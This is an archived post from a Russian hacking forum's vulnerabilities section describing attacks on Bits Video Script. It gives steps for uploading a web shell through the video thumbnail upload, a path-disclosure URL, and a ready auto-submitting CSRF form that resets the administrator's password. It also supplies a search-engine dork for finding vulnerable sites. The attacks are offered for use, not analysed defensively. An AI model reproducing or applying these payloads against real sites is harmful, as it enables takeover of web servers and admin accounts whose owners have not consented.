Добро пожаловать! Это — архивная версия форумов на «Хакер.Ru». Она работает в режиме read-only.
 

Уязвимости Bits Video Script

Пользователи, просматривающие топик: none

Зашли как: Guest
Все форумы >> [Уязвимости] >> Уязвимости Bits Video Script
Имя
Сообщение << Старые топики   Новые топики >>
Уязвимости Bits Video Script - 2010-04-30 00:41:41.973333   
akatzuki

Сообщений: 80
Оценки: 0
Присоединился: 2009-05-06 12:20:56.626666
Заливка шелла без прав админа :

Заходим на сайт, регистрируемся : сайт/register.php, входим со своим логином и паролем, заходим сюда : сайт/addvideo.php там где thumbs выбираем свой шелл и заливаем его.
После заливки он находится здесь : cайт/thumbs/имявашегошелла.php



Видео о том как залить шелл : http://www.youtube.com/watch?v=v6AOwLg1v3w

Раскрытие путей :

сайт/search.php?search[]=way&searchsubmit= CSRF уязвимость

&lt;form method=post action="http://сайт/admin/password.php" onsubmit="return checkform(this);" name="csrf"&gt; &lt;input type='text' name='password' value="НОВЫЙ ПАРОЛЬ КОТОРЫЙ ВЫ ПОСТАВИТЕ АДМИНИСТРАТОРУ"&gt; &lt;/form&gt; &lt;script&gt; document.csrf.submit(); &lt;/script&gt;
Поисковой запрос

inurl:search.php?order=views (C) http://forum.kidal.org/showthread.php?t=152
Post #: 1
Страниц:  [1]
Все форумы >> [Уязвимости] >> Уязвимости Bits Video Script







Связаться:
Вопросы по сайту / xakep@glc.ru

Предупреждение: использование полученных знаний в противозаконных целях преследуется по закону.